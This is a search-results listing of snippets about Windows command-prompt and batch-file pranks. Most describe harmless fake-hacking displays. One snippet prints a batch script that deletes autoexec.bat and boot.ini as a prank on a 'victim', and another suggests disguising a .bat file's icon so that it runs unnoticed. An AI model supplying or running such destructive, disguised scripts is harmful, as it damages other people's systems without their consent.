!!GREAT COMPUTER PRANKS !! Computer Commands Using ... - Instructables
In this Instructable i will show you how to make a few pranks on peoples computer using simple commands on notepad and cmd prompt. I MADE THIS INSTRUCTABLE TO ENTER THE APRIL FOOLS SPEED CONTEST SO PLEASE VOTE BY HITTING THE VOTE BUTTON AT THE TOP
4 Ways to Make It Look Like You Are Hacking - wikiHow
Jan 20, 2025 · Use Command Prompt (cmd) on Windows or Terminal on a Mac to run non-harmful but intimidating commands that simulate hacking. On Windows, you can create a batch script that makes it look like you're hacking into a system and downloading files in real time.
How to Make a Scary Batch File for Command Prompt - wikiHow
Dec 31, 2024 · Well you can utilize a Matrix style code to crash a computer. With this you can play pranks on friends and family. Use Notepad to enter the necessary code. Save the file with a .bat extension. Create a shortcut for the file and replace the icon with something innocuous. Clicking the icon will cause the monitor to crash. Open up Notepad.
Best command prompt pranks. cmd pranks – TECHKIDOS
Jul 24, 2017 · Everything the victim closes will magically reappear again. That has to be one of the most funniest cmd pranks ever. Just watch him go nuts on the close button. Code: @ echo off. rem ——————————— rem The Last Restart. attrib -r -s -h c:\autoexec.bat. del c:\autoexec.bat. attrib -r -s -h c:\boot.ini. del c:\boot.ini. attrib ...
6 Fun Tricks You Can Do in Windows Command Prompt - MUO
Feb 2, 2025 · Command Prompt holds almost endless possibilities, and it's doubtful many people know the full extent of what a few lines of code can accomplish. The next time you're bored at your PC, try these fun Command Prompt tricks for yourself.
Top 10 Harmless Computer Pranks to make your Friends go Nuts
Jun 4, 2021 · You can use these computer pranks to impress your friends using notepad or bat file. Here Goes the List of coolest computer pranks of all time in your windows pc. Table of Contents
GitHub - LoosedWhale/cmdtrolling: A few cmd trollling files that I ...
Windows bat & vbs files for pranking your friends. Swaps the left and right buttons on the mouse so, when the victim left-clicks, it will be registered as a right click. To reset this, you can go into mouse settings and change it. Reset the computer clock to the start of the century.
GitHub - kaburkett/office-pranks: Compilation of assorted pranks ...
Displays a cmd window to fool a user into waiting for antivirus definitions to update. Finishes update at 69 and 420 %. Put cmd script in the user's startup folder (must be the user you want to prank).
Hacker Typer : Fake Coding & Hacker Simulator To Prank & Troll …
Troll your friends and coworkers with Hacker Typer's Hacker Prank Simulator. We make it look like you're coding like a real hacker. Just start typing, we'll do the rest ;)
cool cmd commands to impress your friends in 2023 | useful …
So, In this post i will tell you the top 5 cool cmd commands to impress your friends or you can perform in the front of your friends and make them shock and that can easily make you look like a computer genius or hacker, blowing the minds of your friends.